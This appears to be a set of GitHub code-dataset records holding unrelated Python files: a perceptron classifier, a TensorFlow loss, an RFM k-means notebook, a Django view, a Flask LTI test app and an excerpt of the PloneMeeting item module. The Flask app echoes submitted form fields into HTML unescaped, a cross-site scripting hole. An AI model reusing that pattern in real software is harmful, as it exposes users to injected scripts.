Lecture.\n\n        Parameters:\n            X_train: a numpy array of shape (N, D) containing training data;\n                N examples with D dimensions\n            y_train: a numpy array of shape (N,) containing training labels\n        \"\"\"\n        N, D = X_train.shape\n\n        #self.w = np.random.rand(self.n_class,D) # create a weight matrix of shape (1,D)\n        self.w = np.zeros((self.n_class,D))\n        #print(self.w)\n        #print(self.w.shape)\n        #print(y_train[0:20])\n        for iter in range(self.epochs):\n            #if iter > 5:\n            #    self.lr = 0.5\n            for example_num in range(N):\n                x = X_train[example_num]\n                y_label = y_train[example_num]\n                y_hat_list = np.dot(self.w, x) # get the dot product of weight and feature\n                #print(y_label,y_hat_list)\n                y_hat_max = np.argmax(y_hat_list)\n\n                if y_label == y_hat_max:\n                    pass\n                else: # update weight\n                    y_yi = y_hat_list[y_label] # correct label w^T_yi*xi\n                    #y_c = np.argwhere(y_hat_list > y_yi).reshape(1,-1) # all labels higher than y_yi\n\n                    coef_x = (self.lr)*x\n\n                    for class_num in range(self.n_class):\n                        if iter == 0:\n                            #if class_num == y_label:\n                            self.w[y_label] = self.w[y_label] + coef_x\n                            #else:\n                            self.w[class_num] = self.w[class_num] - coef_x\n\n                        if y_hat_list[class_num] > y_yi:\n                            self.w[y_label] = self.w[y_label] + coef_x\n                            self.w[class_num] = self.w[class_num] - coef_x\n\n    def predict(self, X_test: np.ndarray) -> np.ndarray:\n        \"\"\"Use the trained weights to predict labels for test data points.\n\n        Parameters:\n            X_test: a numpy array of shape (N, D) containing testing data;\n                N examples with D dimensions\n\n        Returns:\n            predicted labels for the data in X_test; a 1-dimensional array of\n            length N, where each element is an integer giving the predicted\n            class.\n        \"\"\"\n        N, D = X_test.shape\n        labels = np.zeros((N))\n        #print(self.w.shape)\n        for example_num in range(N):\n            x = X_test[example_num]\n            y_hat = np.dot(self.w,x)\n            labels[example_num] = np.argmax(y_hat)\n\n        return labels","repo_name":"kulbir-ahluwalia/Linear_classifiers","sub_path":"assignment1/models/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"25442891954","text":"# %%\nimport tensorflow as tf\n\n\n@tf.function\ndef mse(y_actual, y_pred):\n    valid = tf.cast(tf.math.reduce_max(y_actual, axis=(1, 2)) > 0, dtype=tf.float32)\n    valid_mask = tf.reshape(valid, [tf.shape(y_actual)[0], 1, 1, tf.shape(valid)[-1]])\n    return tf.reduce_mean(tf.square(y_actual - y_pred) * valid_mask)\n\n\n# %%\nif __name__ == \"__main__\":\n\n    a = tf.constant([\n        [1, 2],\n        [1, 2]\n    ], dtype=tf.float32)\n    b = tf.math.multiply(0.5, a)\n\n\n# %%\n","repo_name":"Qlanowski/rangle","sub_path":"cost_functions.py","file_name":"cost_functions.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"24622242893","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nget_ipython().run_line_magic('run', '\"rfm and cust_segm..ipynb\"')\n\n\n# In[ ]:\n\n\nrfm_df_new\n\n\n# # In this notebook, we will make clusters on the RFM analysis data using K-means, unlike the previous notebook in which we declared our own segments\n\n# \n\n# In[ ]:\n\n\n# we have already checked the skewness and have also applied log transformation\n# in the previous notebook\n\n\n# In[ ]:\n\n\nrfm_df_new\n\n\n# Now we create a new df of the required columns for K-means\n# \n\n# In[ ]:\n\n\nrfm_df_new1 = df[['cust_id', 'Recency', 'Frequency', 'MonetaryValue', 'RFM_Score']]\nrfm_df_new1\n\n\n# In[ ]:\n\n\ngrouped_by_cust_id = rfm_df_new1.groupby('cust_id')\nmean_values_by_cust_id = grouped_by_cust_id.mean()\n\nrfm_df_new1 = mean_values_by_cust_id\n\n\n# In[ ]:\n\n\nrfm_df_new1\n\n\n# In[ ]:\n\n\n\n\n\n# Before applying the standard scaler, we apply label encoding because the\n# \"cust_id\" column of rfm_df_new1 is of string data type\n\n# In[ ]:\n\n\nle = LabelEncoder()\n\n\n# In[ ]:\n\n\n#Get list of categorical variables\ns = (rfm_df_new1.dtypes == 'object')\nobject_cols = list(s[s].index)\n\nprint(\"Categorical variables in the dataset:\", object_cols)\n\n\n# In[ ]:\n\n\nfor i in object_cols:\n    rfm_df_new1[i] = rfm_df_new1[[i]].apply(le.fit_transform)\nprint('all features are now numerical')\n\n\n# In[ ]:\n\n\n\n\n\n# now we apply standard scaling\n\n# In[ ]:\n\n\nscaler = StandardScaler()\nscaler.fit(rfm_df_new1)\nrfm_scaled = pd.DataFrame(scaler.transform(rfm_df_new1), columns=rfm_df_new1.columns)\n\n\n# In[ ]:\n\n\nrfm_scaled\n\n\n# # K-means Clustering\n\n# In[ ]:\n\n\nwcss = []\n\nfor i in range(1,11):\n    kmeans = KMeans(n_clusters=i, random_state=0)\n    kmeans.fit(rfm_scaled)\n    wcss.append(kmeans.inertia_)\n\n\nplt.figure(figsize=(8, 6))\nplt.plot(range(1, 11), wcss, marker='o', linestyle='--')\nplt.title('Elbow Method')\nplt.xlabel('Number of Clusters (i)')\nplt.ylabel('WCSS')\n\nplt.show()\n\n\n# In[ ]:\n\n\nkmeans = KMeans(n_clusters=4, random_state=0)\n\ny_predict = kmeans.fit_predict(rfm_scaled)\n\nrfm_scaled['clusters'] = y_predict\n\n\n\n# y_predict = kmeans.fit_predict(rfm_scaled): Fits the KMeans model to the dataset rfm_scaled and obtains the cluster labels for each data point.\n# \n# rfm_scaled['clusters'] = y_predict: Creates a new column named 'clusters' in the rfm_scaled DataFrame and assigns the cluster labels obtained from the KMeans model.\n# \n# \n# After running this code, rfm_scaled has a new column named 'clusters' that contains the assigned cluster labels based on the KMeans clustering. Each row is now associated with a cluster label indicating the cluster to which the corresponding data point belongs.\n\n# In[ ]:\n\n\n#Plot the clusters\n\ncmap = matplotlib.cm.viridis\n\n\n\nx = rfm_scaled['Recency']\ny = rfm_scaled['Frequency']\nz = rfm_scaled['MonetaryValue']\n\nfig = plt.figure(figsize=(10,8))\nax = plt.subplot(111, projection='3d', label=\"bla\")\nax.scatter(x, y, z, s=40, c=rfm_scaled[\"clusters\"], marker='o', cmap = cmap )\nax.set_title(\"The Plot Of The Clusters\")\nplt.show()\n\n\n# plotting the above graph using plotly.express\n\n# In[ ]:\n\n\nimport plotly.express as px\n\n# Assuming you have the following dataframes and variables\n\nx = rfm_scaled['Recency']\ny = rfm_scaled['Frequency']\nz = rfm_scaled['MonetaryValue']\n\nclusters = rfm_scaled['clusters']\n\nfig = px.scatter_3d(rfm_scaled, x=x, y=y, z=z, color=clusters, size_max=10, opacity=0.7,\n                    title=\"The Plot Of The Clusters\")\nfig.show()\n\n\n# In[ ]:\n\n\nrfm_scaled\n\n\n# In[ ]:\n\n\nrfm_scaled['RFM_Score'].max()\n\n\n# In[ ]:\n\n\nrfm_scaled['RFM_Score'].min()\n\n\n# We observe that the max and min values are not scaled, hence we first normalize\n# the values so that it is easy to create segments\n\n# In[ ]:\n\n\nrfm_scaled['RFM_Score'] = (rfm_scaled['RFM_Score'] - rfm_scaled['RFM_Score'].min()) / (rfm_scaled['RFM_Score'].max() - rfm_scaled['RFM_Score'].min())\n\n# Subtracts the minimum value from each element in the 'RFM_Score' column.\n# Divides the result from the previous step by the range (max-min) of the 'RFM_Score' column.\n# Finally, the normalized values are assigned back to 'RFM_Score'.\n\n\n# In[ ]:\n\n\nrfm_scaled['RFM_cust_seg'] = ''\n\nrfm_scaled.loc[rfm_scaled['RFM_Score'] >= 0.75, 'RFM_cust_seg'] = 'Champions'\nrfm_scaled.loc[(rfm_scaled['RFM_Score'] >= 0.5) & (rfm_scaled['RFM_Score'] < 0.75), 'RFM_cust_seg'] = 'Potential Loyalists'\nrfm_scaled.loc[(rfm_scaled['RFM_Score'] >= 0.25) & (rfm_scaled['RFM_Score'] < 0.5), 'RFM_cust_seg'] = 'At Risk Customers'\nrfm_scaled.loc[(rfm_scaled['RFM_Score'] >= 0) & (rfm_scaled['RFM_Score'] < 0.25), 'RFM_cust_seg'] = \"Can't Lose\"\n\n\n# In[ ]:\n\n\nrfm_scaled['RFM_cust_seg'].value_counts()\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n# Get the cluster labels for each data point\ncluster_labels = kmeans.labels_\n\n# Calculate the size of each cluster\ncluster_sizes = np.unique(cluster_labels, return_counts=True)[1]\n\n# Print the cluster sizes\nprint(cluster_sizes)\n\n\n# pie chart for the cluster distribution\n\n# In[ ]:\n\n\nimport matplotlib.pyplot as plt\n\n# Example cluster distribution data (replace with your actual data)\ncluster_labels = ['Cluster 1', 'Cluster 2', 'Cluster 3', 'Cluster 4']\ncluster_sizes = [245,219,266,63] # Replace with the sizes of your clusters\n\n# Create a pie chart\nplt.figure(figsize=(6, 6))\nplt.pie(cluster_sizes, labels=cluster_labels, autopct='%1.1f%%', startangle=140)\nplt.axis('equal') # Equal aspect ratio ensures that the pie is drawn as a circle.\n\n# Add a title\nplt.title('Cluster Distribution')\n\n# Show the pie chart\nplt.show()\n\n\n# # Summarizing my findings\n\n# In[ ]:\n\n\ndef rfm_values(rfm_scaled):\n    df_new = rfm_scaled.groupby(['clusters']).agg({\n        'Recency': 'mean',\n        'Frequency': 'mean',\n        'MonetaryValue': ['mean', 'count']\n    }).round(0)\n\n    return df_new\n\nrfm_values(rfm_scaled)\n\n\n# # Conclusion\n\n# # 1. 
Cluster 0\n\n# \n# Recency: The mean Recency value is 0.0, suggesting that customers in this cluster have made recent purchases.\n# \n# Frequency: The mean Frequency value is 1.0, indicating a high frequency of purchases. Customers in this cluster are making purchases frequently.\n# \n# MonetaryValue: The mean MonetaryValue is close to 0.0, suggesting moderate spending. Customers in this cluster are spending at a moderate level.\n# \n# Count: This cluster has a count of 245, indicating a significant number of customers.\n\n# # 2. Cluster 1\n\n# \n# Recency: The mean Recency value is 1.0, indicating that customers in this cluster have not made recent purchases.\n# \n# Frequency: The mean Frequency value is -1.0, suggesting low frequency or no recent purchases. Customers in this cluster are not making purchases frequently.\n# \n# MonetaryValue: The mean MonetaryValue is close to 0.0, indicating average spending. Customers in this cluster are spending at an average level.\n# \n# Count: This cluster has a count of 219, suggesting a notable number of customers.\n\n# # 3. Cluster 2\n\n# \n# Recency: The mean Recency value is close to 0.0, suggesting that customers in this cluster have made recent purchases.\n# \n# Frequency: The mean Frequency value is -1.0, suggesting low frequency or no recent purchases. Customers in this cluster are not making purchases frequently.\n# \n# MonetaryValue: The mean MonetaryValue is close to 0.0, suggesting moderate spending. Customers in this cluster are spending at a moderate level.\n# \n# Count: This cluster has the highest count, with 266 customers, indicating it is the largest segment.\n\n# # 4. Cluster 3\n\n# \n# Recency: The mean Recency value is close to 0.0, suggesting recent activity.\n# \n# Frequency: The mean Frequency value is 2.0, indicating a very high frequency of purchases. Customers in this cluster are making purchases very frequently.\n# \n# MonetaryValue: The mean MonetaryValue is 2.0, suggesting high spending. 
Customers in this cluster are high spenders.\n# \n# Count: This cluster has a count of 63, indicating the smallest group of customers.\n\n# # in summary\n\n# Cluster 0 represents customers who are recent and moderate spenders but make purchases frequently.\n# \n# Cluster 1 represents customers who have not made recent purchases and have average spending.\n# \n# Cluster 2 represents a large group of customers who are recent and moderate spenders but do not make purchases frequently.\n# \n# Cluster 3 represents a small group of high-frequency, high-spending customers with recent activity.\n# \n\n# In[ ]:\n\n\n\n\n","repo_name":"chakshat27/RFM-Analysis","sub_path":"RFM &Customer Seg.(using k_means clustering).py","file_name":"RFM &Customer Seg.(using k_means clustering).py","file_ext":"py","file_size_in_byte":8518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73233700534","text":"import json\nfrom django.http import HttpResponse\nfrom django_swagger_utils.drf_server.utils.decorator.interface_decorator \\\n import validate_decorator\nfrom .validator_class import ValidatorClass\nfrom content_management_portal.interactors.create_test_case_interactor import\\\n CreateTestCaseInteractor\nfrom content_management_portal.storages.test_case_storage_implementation \\\n import TestCaseStorageImplementation\nfrom content_management_portal.storages.question_storage_implementation \\\n import QuestionStorageImplementation\nfrom content_management_portal.presenters.presenter_implementation import\\\n PresenterImplementation\n\n\n\n@validate_decorator(validator_class=ValidatorClass)\ndef api_wrapper(*args, **kwargs):\n test_case_details = kwargs['request_data']\n question_id = kwargs['question_id']\n test_case_storage = TestCaseStorageImplementation()\n presenter = PresenterImplementation()\n question_storage = QuestionStorageImplementation()\n interactor = CreateTestCaseInteractor(\n test_case_storage=test_case_storage,\n presenter=presenter,\n question_storage=question_storage\n )\n response = interactor.create_test_case(\n question_id=question_id, test_case_details=test_case_details\n )\n json_response = json.dumps(response)\n return HttpResponse(json_response, status=201)","repo_name":"bammidichandini/content_management_portal","sub_path":"content_management_portal/views/create_coding_question_test_case/api_wrapper.py","file_name":"api_wrapper.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36029717820","text":"from flask import Flask\nfrom flask import request\n\nimport logging\n\nimport xml_templates\n\n# If `entrypoint` is not defined in app.yaml, App Engine will look for an app\n# called `app` in `main.py`.\napp = Flask(__name__)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef hello():\n print(f\"Received a request: {request.form}, {request.args}\")\n if \"lis_person_name_full\" in request.form:\n return_string = f\"
<h1>Hello {request.form['lis_person_name_full']}!</h1><p>Data sent:</p><ul>\"\n        for k, v in request.form.items():\n            return_string += f\"<li>{k}: {v}</li>\"\n        return return_string + \"</ul>\"\n    return \"<h1>Well, hello..?</h1>\"\n\n\n@app.route('/lti', methods=['GET', 'POST'])\ndef lti():\n    print(f\"Received a request: {request.form}, {request.args}\")\n    return xml_templates.get_xml_config()\n\n\nif __name__ == '__main__':\n    # This is used when running locally only. When deploying to Google App\n    # Engine, a webserver process such as Gunicorn will serve the app. This\n    # can be configured by adding an `entrypoint` to app.yaml.\n    app.run(host='127.0.0.1', port=8080, debug=True)\n","repo_name":"autocheck-thesis/lti-provider","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"5916682214","text":"'''Write a class Employee with name, age, job attributes, experience.\nAdd a method which calculates salary: basic_salary*(experience + job_coefficient)\n\nAdd a method which calculates the max experience valid for the job:\nmax_experience is reached when JOB_EFFICIENCE_COEF < current salary,\nand a method which returns whether the employee is over-experienced for the job'''\n\nclass Employee:\n\n    BASIC_SALARY = 100\n\n    JOB_SALARY_COEF = {\n        'developer': 1.5,\n        'devops': 2,\n        'admin': 1.25,\n        'pm': 2.5 }\n\n    JOB_EFFICIENCE_COEF = {\n        'developer': 1500,\n        'devops': 2000,\n        'admin': 800,\n        'pm': 2100 }\n\n    def __init__(self, name, age, job_attributes, experience):\n        self.name = name\n        self.age = age\n        self.job_attributes = job_attributes\n        self.experience = experience\n\n    def calculate_salary(self):\n        # per the docstring, the salary formula uses the job (salary)\n        # coefficient, not the efficience threshold\n        salary = self.BASIC_SALARY*(self.experience + self.JOB_SALARY_COEF[self.job_attributes])\n        return salary\n\n    def calculate_max_experience(self):\n        if self.JOB_EFFICIENCE_COEF[self.job_attributes] < self.calculate_salary():\n            return self.experience\n\n\nemployee1 = Employee(\"Bob\", 43, \"pm\", 60000)\n\nprint(employee1.calculate_max_experience())","repo_name":"marinasupernova/its_my_py","sub_path":"module4/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"27705787116","text":"# -*- coding: utf-8 -*-\n\nfrom AccessControl import ClassSecurityInfo\nfrom AccessControl import Unauthorized\nfrom AccessControl.PermissionRole import rolesForPermissionOn\nfrom Acquisition import aq_base\nfrom App.class_init import InitializeClass\nfrom appy.gen import No\nfrom archetypes.referencebrowserwidget.widget import ReferenceBrowserWidget\nfrom collections import OrderedDict\nfrom collective.behavior.talcondition.utils import _evaluateExpression\nfrom collective.contact.plonegroup.utils import get_all_suffixes\nfrom collective.contact.plonegroup.utils import get_organization\nfrom collective.contact.plonegroup.utils import get_plone_group_id\nfrom collective.iconifiedcategory.interfaces import IIconifiedInfos\nfrom copy import deepcopy\nfrom datetime import datetime\nfrom DateTime import DateTime\nfrom imio.actionspanel.utils import unrestrictedRemoveGivenObject\nfrom imio.helpers.cache import get_cachekey_volatile\nfrom imio.helpers.cache import get_current_user_id\nfrom imio.helpers.cache import get_plone_groups_for_user\nfrom imio.helpers.content import get_vocab\nfrom imio.helpers.content import get_vocab_values\nfrom imio.helpers.content import safe_delattr\nfrom imio.helpers.content import safe_encode\nfrom imio.helpers.content import uuidsToObjects\nfrom imio.helpers.content import uuidToCatalogBrain\nfrom imio.helpers.content import uuidToObject\nfrom imio.helpers.security 
import fplog\nfrom imio.helpers.workflow import do_transitions\nfrom imio.helpers.workflow import get_transitions\nfrom imio.helpers.xhtml import is_html\nfrom imio.history.utils import get_all_history_attr\nfrom imio.history.utils import getLastWFAction\nfrom imio.prettylink.interfaces import IPrettyLink\nfrom natsort import humansorted\nfrom OFS.ObjectManager import BeforeDeleteException\nfrom persistent.list import PersistentList\nfrom persistent.mapping import PersistentMapping\nfrom plone import api\nfrom plone.memoize import ram\nfrom Products.Archetypes.atapi import BaseFolder\nfrom Products.Archetypes.atapi import BooleanField\nfrom Products.Archetypes.atapi import DateTimeField\nfrom Products.Archetypes.atapi import DisplayList\nfrom Products.Archetypes.atapi import IntegerField\nfrom Products.Archetypes.atapi import LinesField\nfrom Products.Archetypes.atapi import MultiSelectionWidget\nfrom Products.Archetypes.atapi import OrderedBaseFolder\nfrom Products.Archetypes.atapi import OrderedBaseFolderSchema\nfrom Products.Archetypes.atapi import ReferenceField\nfrom Products.Archetypes.atapi import registerType\nfrom Products.Archetypes.atapi import RichWidget\nfrom Products.Archetypes.atapi import Schema\nfrom Products.Archetypes.atapi import SelectionWidget\nfrom Products.Archetypes.atapi import StringField\nfrom Products.Archetypes.atapi import StringWidget\nfrom Products.Archetypes.atapi import TextAreaWidget\nfrom Products.Archetypes.atapi import TextField\nfrom Products.CMFCore.permissions import ManagePortal\nfrom Products.CMFCore.permissions import ModifyPortalContent\nfrom Products.CMFCore.permissions import ReviewPortalContent\nfrom Products.CMFCore.permissions import View\nfrom Products.CMFCore.utils import _checkPermission\nfrom Products.CMFCore.WorkflowCore import WorkflowException\nfrom Products.CMFDynamicViewFTI.browserdefault import BrowserDefaultMixin\nfrom Products.CMFPlone.utils import safe_unicode\nfrom Products.PloneMeeting.browser.itemvotes import next_vote_is_linked\nfrom Products.PloneMeeting.config import AddAdvice\nfrom Products.PloneMeeting.config import AUTO_COPY_GROUP_PREFIX\nfrom Products.PloneMeeting.config import BUDGETIMPACTEDITORS_GROUP_SUFFIX\nfrom Products.PloneMeeting.config import CONSIDERED_NOT_GIVEN_ADVICE_VALUE\nfrom Products.PloneMeeting.config import DEFAULT_COPIED_FIELDS\nfrom Products.PloneMeeting.config import DUPLICATE_AND_KEEP_LINK_EVENT_ACTION\nfrom Products.PloneMeeting.config import DUPLICATE_EVENT_ACTION\nfrom Products.PloneMeeting.config import EXTRA_COPIED_FIELDS_FROM_ITEM_TEMPLATE\nfrom Products.PloneMeeting.config import EXTRA_COPIED_FIELDS_SAME_MC\nfrom Products.PloneMeeting.config import HIDDEN_DURING_REDACTION_ADVICE_VALUE\nfrom Products.PloneMeeting.config import HIDE_DECISION_UNDER_WRITING_MSG\nfrom Products.PloneMeeting.config import INSERTING_ON_ITEM_DECISION_FIRST_WORDS_NB\nfrom Products.PloneMeeting.config import ITEM_COMPLETENESS_ASKERS\nfrom Products.PloneMeeting.config import ITEM_COMPLETENESS_EVALUATORS\nfrom Products.PloneMeeting.config import ITEM_NO_PREFERRED_MEETING_VALUE\nfrom Products.PloneMeeting.config import MEETINGMANAGERS_GROUP_SUFFIX\nfrom Products.PloneMeeting.config import NO_COMMITTEE\nfrom Products.PloneMeeting.config import NO_TRIGGER_WF_TRANSITION_UNTIL\nfrom Products.PloneMeeting.config import NOT_ENCODED_VOTE_VALUE\nfrom Products.PloneMeeting.config import NOT_GIVEN_ADVICE_VALUE\nfrom Products.PloneMeeting.config import NOT_VOTABLE_LINKED_TO_VALUE\nfrom Products.PloneMeeting.config import 
PMMessageFactory as _\nfrom Products.PloneMeeting.config import PROJECTNAME\nfrom Products.PloneMeeting.config import ReadBudgetInfos\nfrom Products.PloneMeeting.config import READER_USECASES\nfrom Products.PloneMeeting.config import REINDEX_NEEDED_MARKER\nfrom Products.PloneMeeting.config import SENT_TO_OTHER_MC_ANNOTATION_BASE_KEY\nfrom Products.PloneMeeting.config import WriteBudgetInfos\nfrom Products.PloneMeeting.config import WriteCommitteeFields\nfrom Products.PloneMeeting.config import WriteDecision\nfrom Products.PloneMeeting.config import WriteInternalNotes\nfrom Products.PloneMeeting.config import WriteItemMeetingManagerFields\nfrom Products.PloneMeeting.config import WriteMarginalNotes\nfrom Products.PloneMeeting.content.meeting import Meeting\nfrom Products.PloneMeeting.events import item_added_or_initialized\nfrom Products.PloneMeeting.interfaces import IMeetingItem\nfrom Products.PloneMeeting.interfaces import IMeetingItemWorkflowActions\nfrom Products.PloneMeeting.interfaces import IMeetingItemWorkflowConditions\nfrom Products.PloneMeeting.model.adaptations import get_waiting_advices_infos\nfrom Products.PloneMeeting.model.adaptations import RETURN_TO_PROPOSING_GROUP_MAPPINGS\nfrom Products.PloneMeeting.utils import _addManagedPermissions\nfrom Products.PloneMeeting.utils import _base_extra_expr_ctx\nfrom Products.PloneMeeting.utils import _clear_local_roles\nfrom Products.PloneMeeting.utils import _get_category\nfrom Products.PloneMeeting.utils import _storedItemNumber_to_itemNumber\nfrom Products.PloneMeeting.utils import add_wf_history_action\nfrom Products.PloneMeeting.utils import addDataChange\nfrom Products.PloneMeeting.utils import AdvicesUpdatedEvent\nfrom Products.PloneMeeting.utils import checkMayQuickEdit\nfrom Products.PloneMeeting.utils import cleanMemoize\nfrom Products.PloneMeeting.utils import compute_item_roles_to_assign_to_suffixes\nfrom Products.PloneMeeting.utils import decodeDelayAwareId\nfrom Products.PloneMeeting.utils import down_or_up_wf\nfrom Products.PloneMeeting.utils import escape\nfrom Products.PloneMeeting.utils import fieldIsEmpty\nfrom Products.PloneMeeting.utils import forceHTMLContentTypeForEmptyRichFields\nfrom Products.PloneMeeting.utils import get_states_before\nfrom Products.PloneMeeting.utils import getCurrentMeetingObject\nfrom Products.PloneMeeting.utils import getCustomAdapter\nfrom Products.PloneMeeting.utils import getFieldVersion\nfrom Products.PloneMeeting.utils import getWorkflowAdapter\nfrom Products.PloneMeeting.utils import hasHistory\nfrom Products.PloneMeeting.utils import is_editing\nfrom Products.PloneMeeting.utils import ItemDuplicatedEvent\nfrom Products.PloneMeeting.utils import ItemDuplicatedToOtherMCEvent\nfrom Products.PloneMeeting.utils import ItemLocalRolesUpdatedEvent\nfrom Products.PloneMeeting.utils import networkdays\nfrom Products.PloneMeeting.utils import normalize\nfrom Products.PloneMeeting.utils import notifyModifiedAndReindex\nfrom Products.PloneMeeting.utils import reindex_object\nfrom Products.PloneMeeting.utils import rememberPreviousData\nfrom Products.PloneMeeting.utils import sendMail\nfrom Products.PloneMeeting.utils import sendMailIfRelevant\nfrom Products.PloneMeeting.utils import set_field_from_ajax\nfrom Products.PloneMeeting.utils import transformAllRichTextFields\nfrom Products.PloneMeeting.utils import translate_list\nfrom Products.PloneMeeting.utils import updateAnnexesAccess\nfrom Products.PloneMeeting.utils import validate_item_assembly_value\nfrom Products.PloneMeeting.utils import 
workday\nfrom Products.PloneMeeting.widgets.pm_textarea import render_textarea\nfrom zope.annotation.interfaces import IAnnotations\nfrom zope.component import getAdapter\nfrom zope.component import getMultiAdapter\nfrom zope.component import queryUtility\nfrom zope.event import notify\nfrom zope.i18n import translate\nfrom zope.interface import implements\nfrom zope.schema.interfaces import IVocabularyFactory\n\nimport html\nimport itertools\nimport logging\n\n\nlogger = logging.getLogger('PloneMeeting')\n\n# PloneMeetingError-related constants -----------------------------------------\nITEM_REF_ERROR = 'There was an error in the TAL expression for defining the ' \\\n    'format of an item reference. Please check this in your meeting config. ' \\\n    'Original exception: %s'\nAUTOMATIC_ADVICE_CONDITION_ERROR = \"There was an error in the TAL expression '{0}' \" \\\n    \"defining if the advice of the group must be automatically asked for '{1}'. \" \\\n    \"Original exception : {2}\"\nADVICE_AVAILABLE_ON_CONDITION_ERROR = \"There was an error in the TAL expression \" \\\n    \"'{0}' defined in the \\'Available on\\' column of the MeetingConfig.customAdvisers \" \\\n    \"evaluated on {1}. Original exception : {2}\"\nAS_COPYGROUP_CONDITION_ERROR = \"There was an error in the TAL expression '{0}' \" \\\n    \"defining if a group must be set as copyGroup for item at '{1}'. \" \\\n    \"Original exception : {2}\"\nAS_COPYGROUP_RES_ERROR = \"While setting automatically added copyGroups, the Plone group suffix '{0}' \" \\\n    \"returned by the expression on organization '{1}' does not exist.\"\nWRONG_TRANSITION = 'Transition \"%s\" is inappropriate for adding recurring ' \\\n    'items.'\nREC_ITEM_ERROR = 'There was an error while trying to generate recurring ' \\\n    'item with id \"%s\". Unable to trigger transition \"%s\". 
Original error message is \"%s\".'\nBEFOREDELETE_ERROR = 'A BeforeDeleteException was raised by \"%s\" while ' \\\n    'trying to delete an item with id \"%s\"'\nWRONG_ADVICE_TYPE_ERROR = 'The given adviceType \"%s\" does not exist!'\nINSERT_ITEM_ERROR = 'There was an error when inserting the item, ' \\\n    'please contact system administrator!'\n\n\nclass MeetingItemWorkflowConditions(object):\n    '''Adapts a MeetingItem to interface IMeetingItemWorkflowConditions.'''\n    implements(IMeetingItemWorkflowConditions)\n    security = ClassSecurityInfo()\n\n    def __init__(self, item):\n        self.context = item\n        self.tool = api.portal.get_tool('portal_plonemeeting')\n        self.cfg = self.tool.getMeetingConfig(self.context)\n        self.review_state = self.context.query_state()\n\n    def _publishedObjectIsMeeting(self):\n        '''Is the object currently published in Plone a Meeting ?'''\n        obj = getCurrentMeetingObject(self.context)\n        return isinstance(obj, Meeting)\n\n    def _getLastValidationState_cachekey(method, self, before_last=False, return_level=False):\n        '''cachekey method for self._getLastValidationState.'''\n        return self.context.getProposingGroup(), before_last, return_level\n\n    # not ramcached, perf tests say it does not change much\n    # and this avoids useless entries in the cache\n    # @ram.cache(_getLastValidationState_cachekey)\n    def _getLastValidationState(self, before_last=False, return_level=False):\n        '''The last validation state is the validation level state defined in\n           MeetingConfig.itemWFValidationLevels for which the linked\n           suffixed Plone group is not empty.\n           If p_before_last=True, then we return the before_last level.\n           If p_return_level=True we return the last validation state and\n           the full validation level from cfg.getItemWFValidationLevels.'''\n        levels = list(self.cfg.getItemWFValidationLevels(only_enabled=True))\n        res = 'itemcreated'\n        # get suffixed Plone group in reverse order of defined validation levels\n        levels.reverse()\n        found_last = False\n        found_before_last = False\n        level = {}\n        for level in levels:\n            if self.tool.group_is_not_empty(self.context.getProposingGroup(), level['suffix']):\n                res = level['state']\n                if found_last:\n                    found_before_last = True\n                else:\n                    found_last = True\n            if (found_last and not before_last) or found_before_last:\n                break\n        if return_level:\n            return res, level\n        else:\n            return res\n\n    def _check_required_data(self, destination_state):\n        '''Make sure required data are encoded when necessary.'''\n        msg = None\n        # 2 cases: either transitions are triggered automatically, as it is the case\n        # when item created by WS or when sent to another MC and transitions triggered,\n        # in this case we only validate the 'present' transition\n        # or we are using the UI (actionspanel), in this case, we validate every transition\n        if destination_state == 'presented' or \\\n           ('imio.actionspanel_portal_cachekey' in self.context.REQUEST and\n                not self.context.REQUEST.get('disable_check_required_data')):\n            if self.context.attribute_is_used(\"category\") and \\\n               not self.context.getCategory(theObject=True):\n                msg = No(_('required_category_ko'))\n            elif self.context.attribute_is_used('classifier') and not self.context.getClassifier():\n                msg = No(_('required_classifier_ko'))\n            elif (self.context.attribute_is_used('proposingGroupWithGroupInCharge') or\n                  self.context.attribute_is_used('groupsInCharge')) and \\\n                    not self.context.getGroupsInCharge():\n                msg = No(_('required_groupsInCharge_ko'))\n        return msg\n\n    def _mayShortcutToValidationLevel(self, destinationState):\n        '''When using WFAdaptation 
'item_validation_shortcuts',\n           is current user able to use the shortcut to p_destinationState?'''\n        res = False\n        if 'item_validation_shortcuts' in self.cfg.getWorkflowAdaptations():\n            # get previous item validation state and check what suffixes may manage\n            item_val_levels_states = self.cfg.getItemWFValidationLevels(\n                data='state', only_enabled=True)\n            previous_val_state = item_val_levels_states[\n                item_val_levels_states.index(destinationState) - 1]\n            previous_suffixes = self.cfg.getItemWFValidationLevels(\n                states=[previous_val_state], data='extra_suffixes', only_enabled=True)\n            previous_main_suffix = self.cfg.getItemWFValidationLevels(\n                states=[previous_val_state], data='suffix', only_enabled=True)\n            previous_suffixes.append(previous_main_suffix)\n            previous_suffixes = tuple(set(previous_suffixes))\n            previous_group_managing_item_uid = self.context.adapted()._getGroupManagingItem(\n                previous_val_state)\n            res = bool(self.tool.get_filtered_plone_groups_for_user(\n                org_uids=[previous_group_managing_item_uid], suffixes=previous_suffixes))\n            # when previous_val_state group suffix is empty, we replay _mayShortcutToValidationLevel\n            # but with this previous state as destinationState\n            # XXX TO BE CONFIRMED\n            if not res and not self.tool.group_is_not_empty(\n                    previous_group_managing_item_uid, previous_main_suffix):\n                return self._mayShortcutToValidationLevel(previous_val_state)\n        else:\n            res = True\n        return res\n\n    security.declarePublic('mayProposeToNextValidationLevel')\n\n    def mayProposeToNextValidationLevel(self, destinationState):\n        '''Check if able to propose to next validation level.'''\n        res = False\n        if 